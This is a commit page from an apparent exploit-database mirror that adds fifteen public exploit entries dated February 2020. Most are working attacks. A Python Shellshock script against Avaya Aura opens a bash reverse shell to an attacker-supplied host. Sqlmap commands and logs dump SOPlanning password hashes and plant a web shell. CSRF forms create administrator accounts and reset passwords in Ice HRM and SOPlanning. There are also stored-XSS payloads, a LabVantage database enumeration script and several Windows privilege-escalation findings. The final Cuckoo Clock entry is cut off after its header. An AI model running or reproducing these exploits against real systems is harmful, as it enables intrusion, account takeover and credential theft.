bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-18

Browse source 
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
This commit is contained in:
Offensive Security 2020-02-18 05:01:54 +00:00
parent 53517327e7
commit 228a37da9c
16 changed files with 807 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

51
exploits/hardware/webapps/48077.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
###############################################
#!/usr/bin/python
import sys
import requests
if len(sys.argv) < 4:
print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
print "[*] Netcat Listener: nc -lvvnp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]
http_headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
}
def main():
if len(sys.argv) == 4:
print "[+] Success, spawning a shell on your custom port :)..."
requests.get(url, headers=http_headers, verify=False, timeout=5)
else:
print "[-] Something went wrong, quitting..."
sys.exit()
if __name__ == "__main__":
main()

70
exploits/java/webapps/48090.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: LabVantage 8.3 - Information Disclosure
# Google Dork: N/A
# Date: 2020-02-16
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: labvantage.com
# Software Link: N/A
# Version: LabVantage 8.3
# Tested on: *
# CVE : N/A
import requests
import operator
def exploit(target):
print("[+] Fetching LabVantage Database Name..")
start = "name=\"database\" id=\"database\" value=\""
end = "\" >"
vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\""
vend = "viewportTest"
print("[+] Testing URL: " + target)
r = requests.get(target)
memory = r.text
print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)])
print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71])
print("[+] Vulnerable!")
def vuln_check():
target = input("\nTARGET HOST URL (example: target.com:8080): ")
print('[+] Checking if Host is vulnerable.')
target = (str(target) + "/labservices/logon.jsp")
r = requests.get(target)
memory = r.text
s = "name=\"database\" id=\"database\" value=\""
if not operator.contains(memory, s):
print("[-] Not Vulnerable!")
exit(0)
else:
exploit(target)
def attack():
target = input("\nTARGET HOST URL (example: http://target.com:8080): ")
enum = input("\nDB NAME TO CHECK: ")
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
'Content-Type': 'application/x-www-form-urlencoded'}
payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false',
'_viewport': 'null', 'username': 'null', 'password': 'null',
'database': ''+str(enum)+'', 'csrftoken': 'null'})
target = (str(target) + "/labservices/rc?command=login")
print("[+] Testing URL: " + target)
r = requests.post(target, headers=headers, data=payload)
memory = r.text
start = "Unrecognized"
if start in memory:
print('[+] DB NOT FOUND!')
else:
print('[!] NO FOUND!')
print("\n1. Vulnerability Check\n2. DB Name Enumeration\n")
option = input("CHOSE OPTION: ")
if option == "1":
vuln_check()
elif option == "2":
attack()
else:
print("Wrong option selected, try again!")

61
exploits/php/webapps/48074.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
# The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page:
# POC:
# The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table.
# Capture the request in Burpsuite:
GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC
Connection: close
Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D
Upgrade-Insecure-Requests: 1
# Feed the request into SQLMap:
sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
Then you will be able to see the information for the users in the database:
root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
___
__H__
___ ___[(]_____ ___ ___ {1.4.1.2#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:13:27 /2020-02-14/
[11:13:27] [INFO] parsing HTTP request from 'projects.req'
[11:13:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: by (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END))
Type: time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1)
---
Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.

43
exploits/php/webapps/48076.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting
# Date: 2020-01-23
# Vendor Homepage: https://strongtestimonials.com
# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 2.40.0 and below
# CVE : CVE-2020-8549
# 1. Description
# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with
# over 90,000 active installations. In the client details section which is seen when adding
# or editing a testimonial, the custom[client_name] and custom[company_name] parameters
# were found to be vulnerable to stored cross-site scripting. All WordPress websites
# using Strong Testimonials version 2.40.0 and below are affected.
2. Proof of Concept
When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.
The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.
POST /wp-admin/post.php HTTP/1.1
Host: testing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1402
Origin: http://testing.com
Connection: close
Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg
Upgrade-Insecure-Requests: 1
_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator
3. Timeline
Vulnerability reported to the Strong Testimonials team January 23, 2020
Strong Testimonials version 2.40.1 containing the fix released January 25, 2020

40
exploits/php/webapps/48082.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://icehrm.com/
# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0
# Tested on Windows 10/Kali Rolling
# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:
# POC for user creation:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTHERE/icehrm/app/service.php">
<input type="hidden" name="t" value="User" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="saveUser" />
<input type="hidden" name="mod" value="admin&#61;users" />
<input type="hidden" name="req" value="&#123;"username"&#58;"test"&#44;"email"&#58;"test&#64;test&#46;com"&#44;"employee"&#58;"1"&#44;"user&#95;level"&#58;"Admin"&#44;"user&#95;roles"&#58;"&#91;&#92;"2&#92;"&#93;"&#44;"lang"&#58;"NULL"&#44;"default&#95;module"&#58;"NULL"&#44;"csrf"&#58;"c0bdded55472fab56c578386143a1854e6f8dd11"&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# POC for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTHERE/icehrm/app/service.php">
<input type="hidden" name="t" value="User" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="changePassword" />
<input type="hidden" name="mod" value="admin&#61;users" />
<input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"admin123"&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

25
exploits/php/webapps/48083.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A
.:: Theme Description ::.
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your Java Script Codes to Name & Email Fields
Step 3 - Click Post Comment
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145

69
exploits/php/webapps/48086.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
# user creation and for changing passwords (Specifically the admin password)
# POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# POC for admin password change:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="1581702103306" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="fr" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

67
exploits/php/webapps/48089.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks, Homebrewer
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution.
Exploit POC:
Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection.
Save the admin hash and insert it into SQLMap as such:
sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell\
Now you have a web shell uploaded to the server:
11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable
GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests:
---
Parameter: users (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3
Type: UNION query
Title: MySQL UNION query (NULL) - 42 columns
Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3
---
[11:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.2.26
back-end DBMS: MySQL >= 5.0.12
[11:53:02] [INFO] going to use a web backdoor for command prompt
[11:53:02] [INFO] fingerprinting the back-end DBMS operating system
[11:53:02] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n
[11:53:07] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www
[11:53:23] [WARNING] unable to automatically parse any web server path
[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method
[11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/'
[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method
[11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query
[11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B)
[11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php
Using that webshell you can upload your reverse shell.
Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist.

35
exploits/windows/local/48075.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-14
# Vendor Homepage:https://www8.hp.com/mx/es/home.html
# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
# HP Development Company, L.P.
# Tested Version: 1.2.9.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be
# executed during application startup or reboot. If successful, the local user's code would
# execute with the elevated privileges of the application.

27
exploits/windows/local/48078.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: 2.0.1214
# Tested On: Windows 10 (32-bit)
C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto
C:\Users\user>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BOOTP Turbo
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BOOTP Turbo
DEPENDENCIES : Nsi
: Afd
: NetBT
: Tcpip
SERVICE_START_NAME : LocalSystem

104
exploits/windows/local/48079.txt Normal file
View file

@ -0,0 +1,104 @@
# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty
[Exploit Program]
Link:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
[Vendor]
Microsoft
[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability
[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer
when MSI packages process symbolic links. An attacker who successfully
exploited this vulnerability could bypass access restrictions to add or
remove files.
To exploit this vulnerability, an attacker would first have to log on to
the system. An attacker could then run a specially crafted application that
could exploit the vulnerability and add or remove files.
The security update addresses the vulnerability by modifying how to reparse
points are handled by the Windows Installer.
[Security Issue]
Elevation of Privilege from user to C:\Windows\administartion execution
files
[References]
# CVE-2020-0683
Original Poc sent to MSRC.
Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
Source code for Visual Studio C++ 2019
Inside "nu11secur1ty" you'll find the exploit (exe) to execute.
# Note:
This test is using `system.ini` in c:\Windows\system.ini
When you exploit this file you should replace with the original file
`system.ini` after this test, which you will find in CVE-2020-0683
directory :)
--------------------------------------------------------------------------
- - How to run the exploit
Go into "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini"
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.
- Disclaimer:
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- @nu11secur1ty
[Network Access]
Local
[Disclosure Timeline]
02/11/2020
[Disclaimer]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
nu11secur1ty
--

26
exploits/windows/local/48080.txt Normal file
View file

@ -0,0 +1,26 @@
Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: https://www.weird-solutions.com
Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe
Version: 4.6.1298
Tested On: Windows 10 (32-bit)
C:\Users\user>sc qc "DHCP Turbo 4"
SERVICE_NAME: DHCP Turbo 4
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DHCP Turbo 4
DEPENDENCIES : Nsi
: Afd
: NetBT
: Tcpip
SERVICE_START_NAME : LocalSystem
C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo"
DisplayName PathName StartMode
DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto

27
exploits/windows/local/48085.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe
# Version: 4.6.1273
# Tested On: Windows 10 (32-bit)
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """
TFTP Turbo 4 C:\Program Files\TFTP Turbo 4\tftpt.exe Auto
C:\Users\nightelf>sc qc "TFTP Turbo 4"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TFTP Turbo 4
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\TFTP Turbo 4\tftpt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TFTP Turbo 4
DEPENDENCIES : Nsi
: Afd
: NetBT
: Tcpip
SERVICE_START_NAME : LocalSystem

65
exploits/windows/local/48087.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
